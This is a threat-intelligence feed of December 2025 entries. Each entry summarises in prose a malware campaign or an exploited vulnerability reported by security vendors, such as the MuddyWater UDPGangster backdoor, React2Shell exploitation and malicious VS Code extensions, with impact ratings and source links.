UDPGangster_Backdoor
MEDIUM
Intel Source:
Polyswarm
Intel Name:
UDPGangster_Backdoor
Date of Scan:
2025-12-17
Impact:
MEDIUM
Summary:
Researchers at PolySwarm have identified UDPGangster, a UDP-based backdoor linked to the Iranian state-aligned MuddyWater threat actor, actively used in targeted phishing campaigns against users in Turkey, Israel, and Azerbaijan. The malware is delivered via phishing emails that impersonate official government entities and include macro-enabled Microsoft Word documents. When recipients enable macros, embedded VBA code silently drops and executes the payload while displaying a benign decoy image to avoid arousing suspicion. Once installed, UDPGangster provides attackers with remote access over UDP, enabling command execution, file exfiltration, and deployment of additional payloads while bypassing many traditional network defenses that primarily monitor TCP traffic. The malware also establishes persistence on the infected system and employs extensive anti-analysis and anti-sandbox techniques, including virtual machine detection, hardware and memory checks, debugger detection, and scans for analysis tools, ensuring it primarily executes on real victim environments.
Source: https://blog.polyswarm.io/muddywaters-udpgangster-backdoor
2025-12-17
Rust_Malware_Analysis_Techniques_Sample_Breakdown
LOW
Intel Source:
Binary Defense
Intel Name:
Rust_Malware_Analysis_Techniques_Sample_Breakdown
Date of Scan:
2025-12-17
Impact:
LOW
Summary:
Binary Defense provides a technical walkthrough of methods for analyzing malware written in the Rust programming language, focusing on compiler behavior, embedded strings, build artifacts, and techniques for recovering entry points in unknown Rust binaries. The report explains how Rust’s lack of a stable ABI, extensive compiler-inserted safety checks, and dependency embedding introduce analytical challenges for defenders. It then demonstrates these techniques on a single unknown Rust sample, revealing its use of HTTP libraries and common Rust runtime initialization patterns, without attributing it to any threat actor or campaign. The report highlights that Rust-based malware is becoming more prevalent due to its cross-platform capabilities and lower detection rates compared to traditional languages. The content is intended to improve analyst proficiency rather than describe an active intrusion or actor behaviors.
Source: https://binarydefense.com/resources/blog/digging-through-rust-to-find-gold-extracting-secrets-from-rust-malware
2025-12-17
PyStoreRAT_Targets_OSINT_Users_via_GitHub
HIGH
Intel Source:
Morphisec and Hackread
Intel Name:
PyStoreRAT_Targets_OSINT_Users_via_GitHub
Date of Scan:
2025-12-17
Impact:
HIGH
Summary:
https://hackread.com/pystorerat-rat-malware-github-osint-researchers/ Researchers at Morphisec and Hackread have identified PyStoreRAT, an AI-enabled supply chain malware that abuses GitHub to distribute trojanized open source repositories. The operators reactivate dormant accounts and publish realistic, AI-generated projects such as OSINT tools, DeFi bots, and GPT-related utilities, which later receive update commits that introduce a JavaScript or HTA backdoor. PyStoreRAT operates as a flexible loader capable of system profiling, payload delivery, adaptive execution based on the presence of endpoint security products, self-propagation via removable media, and modular expansion through externally delivered updates, while its rotating command-and-control architecture provides persistence and redundancy across environments. Russian-language strings in the code suggest mixed targeting. Overall, the campaign reflects an evolution in AI-assisted social engineering that exploits trust in open source ecosystems.
Source: https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/
2025-12-16
BlackForce_Phishing_Kit
HIGH
Intel Source:
Zscaler
Intel Name:
BlackForce_Phishing_Kit
Date of Scan:
2025-12-16
Impact:
HIGH
Summary:
Researchers at Zscaler have identified BlackForce, a commercial phishing kit designed to steal login credentials in real time and bypass multi-factor authentication for widely used online services. The kit is sold on underground forums and distributed through phishing pages that closely replicate legitimate brand login screens. When a user clicks a lure link, BlackForce first verifies that the visitor is a real person, rather than an automated scanner or security researcher, before presenting the fraudulent login page. Victims are prompted to enter their username, password, and, in many cases, a one-time authentication code. This information is immediately transmitted to the attacker, who uses an interactive control panel to inject additional fake prompts into the victim’s browser and replay the captured data on the legitimate service to seize the account. All stolen information is ultimately routed to a backend system that can forward the data to messaging channels for operator use.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-blackforce-phishing-kit
2025-12-16
React2Shell_Multi_Actor_Espionage_Cryptomining
LOW
Intel Source:
Google Threat Intelligence Group
Intel Name:
React2Shell_Multi_Actor_Espionage_Cryptomining
Date of Scan:
2025-12-16
Impact:
LOW
Summary:
Google Threat Intelligence Group (GTIG) reports widespread exploitation of the React2Shell vulnerability (CVE-2025-55182), an unauthenticated RCE flaw in React Server Components used by frameworks such as Next.js. Multiple distinct threat clusters, primarily China-nexus plus at least one Iran-nexus group, are leveraging the bug to deploy tunneling tools, backdoors, and cryptocurrency miners. China-linked cluster UNC6600 uses the flaw to drop the MINOCAT tunneler, gaining persistent covert access to Linux hosts through cron, systemd services, and shell configuration injection. Another China-nexus cluster, UNC6586, deploys the SNOWLIGHT downloader component of the VSHELL backdoor framework, using staged HTTP retrieval of additional payloads disguised as benign files. UNC6588 uses the same vulnerability to distribute the COMPOOD backdoor masquerading as common tools such as Vim, while UNC6603 deploys an updated HISONIC backdoor that hides its configuration behind mainstream cloud services. Cluster UNC6595 installs ANGRYREBEL.LINUX, disguising it as the system’s SSH daemon and applying timestomping and shell history clearing for anti-forensics. In parallel, financially motivated actors rapidly weaponize the vulnerability to install XMRig miners, establishing persistence through new systemd services. Overall, CVE-2025-55182 is enabling both espionage and profit-driven activity against unpatched React/Next.js workloads at global scale.
Source: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182
2025-12-15
PeerBlight_Linux_Backdoor
MEDIUM
Intel Source:
Huntress
Intel Name:
PeerBlight_Linux_Backdoor
Date of Scan:
2025-12-15
Impact:
MEDIUM
Summary:
Researchers at Huntress have discovered that threat actors are exploiting a critical vulnerability in React Server Components to achieve remote code execution on internet-facing applications, then deploying a newly identified Linux backdoor, dubbed PeerBlight, alongside cryptocurrency mining payloads. PeerBlight enables persistent remote access and supports command execution, file manipulation, and tunneling, allowing attackers to maintain full control of compromised servers long after the initial intrusion. After gaining access, the attackers establish new services and disguise malicious processes to ensure persistence. They also deploy auxiliary tooling that facilitates reverse proxying, SOCKS tunneling, and unauthorized user account creation, enabling long-term footholds in victim environments. PeerBlight’s command-and-control channel features encrypted communications, a domain generation algorithm, and a peer-to-peer fallback layer built on BitTorrent DHT. This multi-layered design significantly increases the resilience of the attacker’s infrastructure against traditional blocking or domain takedown efforts.
Source: https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell
2025-12-14
Famous_Chollima_DPRK_IT_Worker_Infiltration
HIGH
Intel Source:
Any.Run
Intel Name:
Famous_Chollima_DPRK_IT_Worker_Infiltration
Date of Scan:
2025-12-14
Impact:
HIGH
Summary:
Researchers at ANY.RUN and NorthScan have identified an ongoing campaign by the Lazarus Group’s Famous Chollima division, which infiltrates Western organizations by posing as legitimate freelance IT workers. The operation employs large-scale social engineering through GitHub, LinkedIn, and Telegram, where DPRK operators masquerade as developers or recruiters to gain employment and internal access to company systems. Once trust is established, victims are persuaded to install remote access software, allowing adversaries full control over their systems and sensitive credentials. The investigation, conducted within a controlled sandbox environment, revealed consistent use of commercial VPNs, browser automation extensions, and identity theft tactics to blend malicious activity with legitimate workflows. Targeting primarily the IT, financial, cryptocurrency, e-commerce, and healthcare sectors, the group seeks to generate revenue and facilitate espionage for the North Korean regime.
Source: https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/
2025-12-14
Cracking_ValleyRAT
HIGH
Intel Source:
CheckPoint
Intel Name:
Cracking_ValleyRAT
Date of Scan:
2025-12-14
Impact:
HIGH
Summary:
Check Point researchers have uncovered ValleyRAT, a modular Windows backdoor supported by a comprehensive development ecosystem that includes a GUI-based builder, multiple plugins, and a customized kernel-mode rootkit. The builder generates customized ValleyRAT payloads by allowing operators to select capabilities such as remote desktop control, file and process management, credential harvesting, and host monitoring. A central component is the kernel driver, derived from open-source code but extensively modified to conceal the malware, safeguard its user-mode components, and interfere with security tooling. It manipulates process structures, hides operational artifacts, and stores configuration data in the registry to make analysis difficult.
Source: https://research.checkpoint.com/2025/cracking-valleyrat-from-builder-secrets-to-kernel-rootkits/
2025-12-14
CastleRAT
MEDIUM
Intel Source:
Splunk
Intel Name:
CastleRAT
Date of Scan:
2025-12-14
Impact:
MEDIUM
Summary:
Researchers at Splunk have discovered a new remote access trojan (RAT) called CastleRAT, which comes in both Python and C-based versions. It provides attackers extensive control and surveillance capabilities on compromised Windows machines. Once installed, it gathers detailed system information and uses various plugins to capture clipboard data, keystrokes, screenshots, and even audio and video from connected devices. CastleRAT can hijack browser sessions, maintain persistence via rundll32 and scheduled tasks, and bypass UAC by abusing trusted binaries. It employs masquerading techniques and uses “dead drop” locations on legitimate websites to retrieve configuration updates and commands. Altogether, these capabilities make CastleRAT a powerful post-compromise tool that can support credential theft, espionage, and further intrusion once attackers have initial access to a system.
Source: https://www.splunk.com/en_us/blog/security/castlerat-malware-detection-splunk-mitre-attck.html
2025-12-13
BRAT_Hijacker_Browser_Manipulation_Malware
MEDIUM
Intel Source:
G-DATA
Intel Name:
BRAT_Hijacker_Browser_Manipulation_Malware
Date of Scan:
2025-12-13
Impact:
MEDIUM
Summary:
Researchers at G DATA CyberDefense have identified a series of browser hijacking techniques used by multiple malware families that target Chromium-based browsers and Firefox. The investigation highlights three distinct mechanisms of compromise, revealing how modern hijackers maintain persistence and evade detection. The first technique involves tampering with browser preference files—such as Chrome’s Secure Preferences or Firefox’s prefs.js—to alter default settings like homepage or search engine configurations, bypassing integrity checks through regenerated HMAC values derived from system data. The second, named BRAT (browser remote access tool), demonstrates the use of automated keystroke emulation to remotely control browser interactions, enabling actions such as tab navigation, clipboard exfiltration, and forced redirections. The third technique leverages a combination of PowerShell and VBScript to disable Chrome’s auto-update policy and install unauthorized extensions via deprecated command-line switches, effectively preventing remediation through normal software updates. Collectively, these techniques show a progression from configuration tampering to full browser automation, representing a growing threat vector that blends persistence, user deception, and credential theft potential.
Source: https://www.gdatasoftware.com/blog/2025/11/38298-learning-about-browser-hijacking
2025-12-13
MoneyMount_ISO_Phantom_Stealer_via_ISO_Files
HIGH
Intel Source:
Seqrite Labs
Intel Name:
MoneyMount_ISO_Phantom_Stealer_via_ISO_Files
Date of Scan:
2025-12-13
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have identified an ongoing phishing campaign, dubbed Operation MoneyMount-ISO, that delivers the Phantom Stealer malware through malicious ISO-mounted executables. The campaign, originating from Russia, employs payment-confirmation–themed phishing emails written in Russian and designed to impersonate legitimate financial correspondence. The attached ZIP archive contains an ISO image that mounts automatically and executes a disguised payload, leading to the deployment of Phantom Stealer. Once active, the malware conducts multi-stage data theft operations, including credential extraction from browsers, Discord token harvesting, cryptocurrency wallet exfiltration, and clipboard and keylogging surveillance. Technical analysis indicates that the malware leverages steganography, anti-virtualization checks, and self-deletion routines to evade detection. Data exfiltration is achieved through multiple channels such as Telegram bots, Discord webhooks, and FTP servers, highlighting a sophisticated exfiltration architecture.
Source: https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/
2025-12-12
Gogs_RCE_Bypass_Actively_Exploited
HIGH
Intel Source:
WIZ
Intel Name:
Gogs_RCE_Bypass_Actively_Exploited
Date of Scan:
2025-12-12
Impact:
HIGH
Summary:
Researchers at Wiz have identified active exploitation of a previously unknown vulnerability in Gogs, a self-hosted Git service. The flaw, tracked as CVE-2025-8110, is a symbolic link bypass that reopens a remote code execution vector thought to be patched under CVE-2024-55947. The vulnerability allows authenticated users to overwrite files outside the repository directory, enabling arbitrary command execution through modification of Git configuration files. Wiz’s investigation began after detecting malware on a customer’s cloud workload, which was traced to this Gogs zero-day. The threat actor leveraged open registration features and API misuse to compromise exposed instances, with over half of observed Gogs servers showing infection signs.
Source: https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
2025-12-12
NANOREMOTE_Windows_Backdoor
MEDIUM
Intel Source:
Elastic Security Labs
Intel Name:
NANOREMOTE_Windows_Backdoor
Date of Scan:
2025-12-12
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have uncovered a new Windows backdoor called NANOREMOTE, delivered through a deceptive loader known as WMLOADER, which masquerades as legitimate security software. The developers behind this tool appear to be the same espionage-focused group previously associated with the FINALDRAFT implant, as indicated by overlapping code and shared cryptographic routines. Once deployed, NANOREMOTE provides attackers with extensive remote-access capabilities, including command execution, host reconnaissance, file manipulation, and in-memory execution of additional payloads. Its flexible beaconing and task-based architecture enable sustained, interactive operations. To evade detection, the malware leverages Google Drive and other common cloud services for payload staging and data exfiltration, allowing its traffic to blend seamlessly with legitimate network activity. WMLOADER further enhances stealth by using an invalid code signature and encrypted shellcode to evade basic security controls.
Source: https://www.elastic.co/security-labs/nanoremote
2025-12-12
React2Shell_RCE_Exploitation_Campaign
HIGH
Intel Source:
Sophos
Intel Name:
React2Shell_RCE_Exploitation_Campaign
Date of Scan:
2025-12-12
Impact:
HIGH
Summary:
Researchers at Sophos Counter Threat Unit (CTU) have identified widespread exploitation of CVE-2025-55182, a critical remote code execution vulnerability in React Server Components, referred to as React2Shell. The flaw stems from unsafe deserialization of network requests in the React “Flight” protocol, allowing attackers to send a single malicious HTTP request to execute arbitrary JavaScript on affected servers without authentication. Exploitation activity has been observed targeting versions 19.0.0 through 19.2.0 of React, with numerous compromised systems deploying multi-stage Linux loaders designed for persistence via cron jobs, systemd, and rc.local. Sophos analysts report that these payloads included obfuscated JavaScript components using AES-256-CBC encryption to conceal follow-on malware and anti-forensic measures to delete installer traces.
Source: https://news.sophos.com/en-us/2025/12/11/react2shell-flaw-cve-2025-55182-exploited-for-remote-code-execution/
2025-12-12
Fake_AI_Pages_Drop_AMOS_Malware
MEDIUM
Intel Source:
Huntress
Intel Name:
Fake_AI_Pages_Drop_AMOS_Malware
Date of Scan:
2025-12-12
Impact:
MEDIUM
Summary:
Researchers from Huntress have uncovered an AMOS Stealer campaign that uses AI-themed troubleshooting pages and search-engine manipulation to lure macOS users. The attack begins when users search for routine Mac maintenance help and are directed to attacker-controlled pages mimicking AI assistants like ChatGPT or Grok. Within these fake chat interfaces, victims are instructed to run benign Terminal commands that actually download and execute a hidden stealer loader. Once active, the malware silently collects system credentials, browser data, and cryptocurrency wallet information while avoiding any visible signs of installation. It persists using standard macOS mechanisms—including LaunchDaemons and user-level watchdog scripts—ensuring it re-launches after reboots or termination attempts. The stealer also checks for virtual machine environments before fully deploying and exfiltrates stolen data to attacker-controlled servers. This campaign exploits user trust in search results, AI chat interfaces, and copy-paste workflows, targeting everyday macOS users, particularly those handling cryptocurrency or sensitive browser-based accounts.
Source: https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust
2025-12-11
EtherRAT_DPRK_Ethereum_implant_via_React2Shell
LOW
Intel Source:
Sysdig Threat Research Team
Intel Name:
EtherRAT_DPRK_Ethereum_implant_via_React2Shell
Date of Scan:
2025-12-11
Impact:
LOW
Summary:
The Sysdig Threat Research Team reports EtherRAT, a Node.js-based persistent implant deployed via React2Shell (CVE-2025-55182). The malware uses blockchain-based C2 resolution through Ethereum smart contracts, a four-stage delivery chain, and AES-encrypted payloads. It downloads a legitimate Node.js runtime to reduce detection and installs five Linux persistence mechanisms for durable access. EtherRAT polls nine RPC endpoints for resilient C2 and supports self-updating to evade signatures. While attribution is not confirmed, several techniques overlap with DPRK “Contagious Interview” tooling. The implant provides operators full asynchronous JavaScript execution for continued reconnaissance and tasking.
Source: https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks
2025-12-11
PA_Email_Compromise_via_Malicious_PDFs
MEDIUM
Intel Source:
CERT AGID
Intel Name:
PA_Email_Compromise_via_Malicious_PDFs
Date of Scan:
2025-12-11
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have identified an ongoing phishing campaign targeting Italian Public Administration (PA) entities through the use of compromised institutional email accounts. The attackers leverage these accounts to distribute convincing emails containing malicious PDF attachments that appear to be legitimate document notifications. When recipients open the attached PDF, they are prompted to click a “Review Documents” button, which redirects them to a genuine Figma login page, exploiting the platform’s legitimacy to collect user credentials. Once the victim attempts to authenticate using an email or Google account, the attackers gain access to real user identifiers and potentially sensitive login information. CERT-AGID confirmed that two PA administrations have been compromised so far, with further spread not ruled out.
Source: https://cert-agid.gov.it/news/campagna-malevola-in-atto-abusa-di-utenze-pa-tramite-allegati-pdf-e-accesso-a-figma/
2025-12-10
Storm_0249_Shifts_to_Precision_Post_Exploitation
HIGH
Intel Source:
Reliaquest
Intel Name:
Storm_0249_Shifts_to_Precision_Post_Exploitation
Date of Scan:
2025-12-10
Impact:
HIGH
Summary:
ReliaQuest researchers have identified Storm-0249 as a financially motivated initial access broker that has shifted from broad phishing campaigns to more targeted post-exploitation operations aimed at hijacking trusted endpoint security processes. The group leverages a legitimate SentinelOne helper process to sideload a malicious DLL, enabling SYSTEM-level execution and long-term persistence through MSI installers. After delivering these deceptive installers via Microsoft-themed infrastructure, the attackers use curl and PowerShell commands to deploy fileless payloads that execute directly in memory. Once inside a network, Storm-0249 performs extensive host reconnaissance using built-in Windows utilities and registry queries, collecting identifiers such as MachineGuid, which ransomware affiliates can later use to bind encryption keys to specific victims. The group also routes its command-and-control traffic through the same SentinelOne process, causing malicious TLS communications to blend in with legitimate EDR telemetry.
Source: https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation
2025-12-10
OFLIP_Ransomware
HIGH
Intel Source:
Palo Alto
Intel Name:
OFLIP_Ransomware
Date of Scan:
2025-12-10
Impact:
HIGH
Summary:
Researchers at Palo Alto Networks have uncovered a financially motivated threat group, known as CL-CRI-1036, using a new Rust-based ransomware called OFLIP to target organizations in the Asia-Pacific region. The attackers gain access through manual intrusions and use the Sliver framework for command-and-control and lateral movement across both Windows and Linux environments. The ransomware is designed to work quickly rather than stealthily. It scans available drives, encrypts user files, and drops ransom notes in writable directories while excluding specific file types to keep systems functional. After encrypting data, it tries to delete and overwrite its own files to make detection harder. The operators demand payment in cryptocurrency and threaten to leak stolen data on underground forums, although the malware itself has no built-in exfiltration capability, suggesting the use of separate tools or potential bluffing.
Source: https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/
2025-12-10
BigBlack_Malicious_VS_Code_Extensions
HIGH
+
Intel Source:
KOI Security
Intel Name:
BigBlack_Malicious_VS_Code_Extensions
Date of Scan:
2025-12-10
Impact:
HIGH
Summary:
Researchers at Koi Security have identified a campaign distributing malicious Visual Studio Code extensions that exfiltrate sensitive developer data through stealthy infostealer payloads. The operation leverages two extensions—one disguised as a cryptocurrency-themed color scheme and another posing as an AI coding assistant—to target developers with varying social engineering lures. Once installed, these extensions execute hidden scripts that download additional payloads capable of capturing screenshots, harvesting WiFi credentials, and stealing browser session tokens. The malware employs DLL hijacking to conceal its activity under legitimate processes, ensuring persistence and evasion of security controls. Analysis of multiple versions revealed iterative refinement by the threat actor, who improved reliability and stealth across updates while maintaining the same command infrastructure and payload delivery chain. Victimology points to software developers and technical professionals, particularly those interested in cryptocurrency or AI-enhanced development tools.
Source: https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen
2025-12-09
AutoIT3_Loader_Shellcode_via_FileInstall_Abuse
HIGH
+
Intel Source:
ISC.SANS
Intel Name:
AutoIT3_Loader_Shellcode_via_FileInstall_Abuse
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at the SANS Internet Storm Center have identified a renewed wave of malicious activity leveraging AutoIT3-compiled scripts as loaders for shellcode execution. AutoIT3, a Windows automation language, is being abused by threat actors to embed and execute payloads through its FileInstall() function, allowing malicious files to be packed directly into compiled executables. The observed campaigns demonstrate how attackers use this feature to unpack obfuscated payloads into temporary directories and execute them in memory, effectively bypassing traditional endpoint defenses. The scripts employ lightweight obfuscation routines to conceal shellcode loading logic, ultimately invoking Windows API calls such as CallWindowProc() to execute malicious code. This technique has been linked to the distribution of remote access and data theft tools, indicating an adaptable and ongoing use of AutoIT3 as a loader platform.
Source: https://isc.sans.edu/index_cached.html
2025-12-09
Intellexa_Ongoing_Zero_Day_Exploits_Persist
HIGH
+
Intel Source:
Google Threat Intelligence
Intel Name:
Intellexa_Ongoing_Zero_Day_Exploits_Persist
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at Google’s Threat Intelligence Group (GTIG) have identified continued offensive cyber operations conducted by the commercial spyware vendor Intellexa, which remains active despite international sanctions and prior exposure. The group has repeatedly developed and deployed zero-day exploit chains targeting major mobile platforms including iOS and Android, often chaining vulnerabilities in Chrome and Safari to achieve remote code execution and privilege escalation. GTIG’s analysis highlights Intellexa’s sustained ability to procure or develop new zero-days rapidly, indicating a robust exploit acquisition network and a high level of technical sophistication. The exploits have been leveraged to deliver Predator spyware, a tool capable of extensive surveillance, including microphone and camera capture, keylogging, and VOIP recording. Recent campaigns have been observed in regions such as Egypt and Saudi Arabia, with delivery mechanisms relying on one-time links and messaging app redirections.
Source: https://cloud.google.com/blog/topics/threat-intelligence/intellexa-zero-day-exploits-continue/
2025-12-09
Shai_Hulud_2_GitHub_NPM_Worm
HIGH
+
Intel Source:
Trustwave and Iru
Intel Name:
Shai_Hulud_2_GitHub_NPM_Worm
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at Trustwave SpiderLabs and Iru have identified Shai-Hulud 2.0, a sophisticated self-replicating malware targeting the Node Package Manager (NPM) ecosystem and GitHub-based CI/CD pipelines. The threat actors behind this campaign exploited a GitHub Actions injection vulnerability to steal NPM publishing tokens, allowing them to distribute maliciously modified NPM packages. Once installed, the malware executes JavaScript-based payloads that harvest authentication credentials and API tokens from cloud platforms including GitHub, AWS, GCP, and Azure. It also propagates automatically by republishing infected packages under compromised developer accounts. The malware establishes persistence by registering the infected host as a GitHub self-hosted runner and abuses GitHub Discussions as a covert command and control mechanism.
Source: https://the-sequence.com/investigating-shai-hulud
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/sha1-hulud-the-second-coming-of-the-new-npm-github-worm/
2025-12-09
VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT
HIGH
+
Intel Source:
Hunt.IO
Intel Name:
VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at Hunt.io have uncovered a supply-chain compromise targeting developers through the Visual Studio Code extension ecosystem, where attackers published a fake Prettier extension under a deceptive publisher profile and delivered a staged attack chain involving a VBScript dropper, an Anivia loader and finally the OctoRAT remote access toolkit. The initial payloads were fetched from a public code repository and relied on AES encryption and process hollowing to stay in memory, while Anivia decrypted and executed OctoRAT inside a legitimate .NET system binary to avoid reputation-based defenses. The scans also found multiple active control panels tied together by shared TLS certificate infrastructure and hosted across European providers.
Source: https://hunt.io/blog/malicious-vscode-extension-anivia-octorat-attack-chain
2025-12-08
Russian_Actor_Spoofs_European_Security_Events
MEDIUM
+
Intel Source:
Volexity
Intel Name:
Russian_Actor_Spoofs_European_Security_Events
Date of Scan:
2025-12-08
Impact:
MEDIUM
Summary:
Researchers have identified that the Russian state-linked group UTA0355 is conducting highly targeted phishing campaigns by impersonating legitimate European security and policy conferences. The actors create polished registration websites for events such as the Belgrade Security Conference and use tailored phishing emails along with follow-up conversations over WhatsApp or Signal to draw in selected Microsoft 365 users. Once credentials are obtained, the attackers access mailboxes and files, register new devices in Entra ID to maintain long-term persistence, and route follow-on activity through proxy infrastructure to obscure their location and blend in with normal user behavior. The group also acquires lookalike domains and leverages obscure email services to build additional conference-themed infrastructure, demonstrating strong social-engineering capabilities and an increasingly mature approach to cloud identity abuse.
Source: https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/
2025-12-08
ShadyPanda_Sleeper_Spyware_Extensions
HIGH
+
Intel Source:
Malwarebytes
Intel Name:
ShadyPanda_Sleeper_Spyware_Extensions
Date of Scan:
2025-12-08
Impact:
HIGH
Summary:
Researchers at Malwarebytes have identified a large-scale spyware campaign leveraging long-dormant Chrome and Edge browser extensions that turned malicious after years of normal behavior. The campaign, linked to the threat group ShadyPanda, affected approximately 4.3 million devices worldwide. Initially published as legitimate tools, the extensions later transformed into a remote code execution platform capable of downloading and executing malicious JavaScript within the browser environment. This allowed attackers to monitor user activity, including visited websites and search queries, and to transmit collected data to infrastructure controlled by actors believed to be operating from China. One of the most widespread extensions, WeTab, accumulated millions of installations before exhibiting malicious behavior.
Source: https://www.malwarebytes.com/blog/news/2025/12/sleeper-browser-extensions-woke-up-as-spyware-on-4-million-devices
2025-12-08
Gamaredon_Exploits_CVE_2025_8088_in_Phishing
MEDIUM
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
Gamaredon_Exploits_CVE_2025_8088_in_Phishing
Date of Scan:
2025-12-08
Impact:
MEDIUM
Summary:
Researchers at the 360 Threat Intelligence Center have observed that APT-C-53 (Gamaredon), a Russia-aligned espionage group active since at least 2013, is escalating its operations against Ukrainian government and military targets in 2025. The campaign abuses a newly disclosed WinRAR directory-traversal flaw, CVE-2025-8088, to deliver spear-phishing archives that quietly drop HTA malware into the Windows startup folder. When opened, the crafted archive writes a hidden payload to a persistence path that executes at the next login, launching a VBScript downloader that fetches a second-stage script from a remote command server. The second stage uses Gamaredon’s typical multi-layer obfuscation, including string replacement and Base64 decoding, to rebuild modules that collect system information, establish C2 communication, deploy extra persistence techniques, and create disguised scheduled tasks for long-term access.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507617&idx=1&sn=9a64ed18ff9ef62dc3e66b76b1ac6a8b&poc_token=HKWjNmmjSO_ORPHgzOWBy8PUxksBUYloflvqDQ20
2025-12-07
UDPGangster_MuddyWater_Espionage_Campaigns
HIGH
+
Intel Source:
Fortinet
Intel Name:
UDPGangster_MuddyWater_Espionage_Campaigns
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at FortiGuard Labs have identified a new wave of espionage-focused campaigns conducted by the MuddyWater threat group deploying a UDP-based backdoor known as UDPGangster. The operation employs malicious Microsoft Word documents containing VBA macros to deliver the malware, which executes once victims enable embedded content. The payload uses the Windows API to decode and run concealed data, establishing command and control over UDP to avoid traditional network detection. Once installed, UDPGangster achieves persistence via registry keys and mutex creation while enabling remote code execution, file exfiltration, and payload updates. The malware incorporates extensive anti-analysis measures, including debugger, hardware, and sandbox detection, ensuring it operates only on genuine systems. FortiGuard analysts observed active campaigns targeting government and educational sectors in Turkey, Israel, and Azerbaijan, using localized phishing lures to improve delivery success. The consistency in TTPs, infrastructure, and document macros links the campaigns to MuddyWater’s ongoing regional espionage activity, highlighting a sustained and technically capable threat actor with strong operational security.
Source: https://www.fortinet.com/blog/threat-research/udpgangster-campaigns-target-multiple-countries
2025-12-07
JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader
HIGH
+
Intel Source:
Securonix Threat Research
Intel Name:
JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at Securonix Threat Research have identified a sophisticated multi-stage web-based intrusion campaign known as JSSMUGGLER, which employs advanced obfuscation and stealth techniques to deliver the NetSupport Remote Access Trojan (RAT). The campaign begins with the injection of an obfuscated JavaScript loader into compromised websites, designed to evade detection through junk text, encoded strings, and dynamic runtime execution. Once executed, the loader determines the victim’s environment, using device-aware logic to deliver a secondary HTML Application (HTA) payload executed through mshta.exe. This HTA stage decrypts and executes a PowerShell stager entirely in memory, bypassing standard execution policies and security controls. The final stage deploys the NetSupport RAT, providing the attacker with persistent remote access, file manipulation, keylogging, and surveillance capabilities.
Source: https://www.securonix.com/blog/jssmuggler-multi-stage-hidden-iframes-obfuscated-javascript-silent-redirectors-netsupport-rat-delivery/
2025-12-07
WARP_PANDA_China_Nexus_vCenter_Intrusions
HIGH
+
Intel Source:
Crowdstrike
Intel Name:
WARP_PANDA_China_Nexus_vCenter_Intrusions
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at CrowdStrike have identified a newly designated China-nexus threat actor known as WARP PANDA, responsible for multiple intrusions throughout 2025 targeting VMware vCenter and ESXi environments across U.S.-based legal, technology, and manufacturing sectors. The group demonstrates a high degree of technical sophistication and operational security, emphasizing persistence and covert access to compromised cloud and virtualization infrastructure. WARP PANDA employs a custom malware toolkit including BRICKSTORM, Junction, and GuestConduit, all written in Golang and designed for tunneling, persistence, and stealth within virtualized networks. The adversary leverages unregistered virtual machines, file timestamp manipulation, and masquerading as legitimate vCenter processes to evade detection.
Source: https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/
2025-12-07
SSH_Trojan_via_Government_IP_Compromise
HIGH
+
Intel Source:
ISC.SANS
Intel Name:
SSH_Trojan_via_Government_IP_Compromise
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at the SANS Internet Storm Center (ISC) identified an intrusion involving a sophisticated SSH-based trojan deployment following a brute-force compromise of a honeypot system. The attack began with an automated login attempt using default credentials, after which the threat actor established a brief connection and uploaded a trojan masquerading as a legitimate SSH daemon. Analysis revealed the malware was engineered for persistence, credential harvesting, privilege escalation, and defense evasion, demonstrating a high degree of operational discipline. The malicious activity mapped to multiple MITRE ATT&CK techniques, including valid account abuse, brute-force authentication, and client software compromise. Investigators noted the source IP address originated from a government network, but emphasized this likely reflected a compromised asset rather than direct state involvement.
Source: https://isc.sans.edu/diary/rss/32536
2025-12-06
Intellexa_Predator_Spyware_Network
HIGH
+
Intel Source:
Recorded Future
Intel Name:
Intellexa_Predator_Spyware_Network
Date of Scan:
2025-12-06
Impact:
HIGH
Summary:
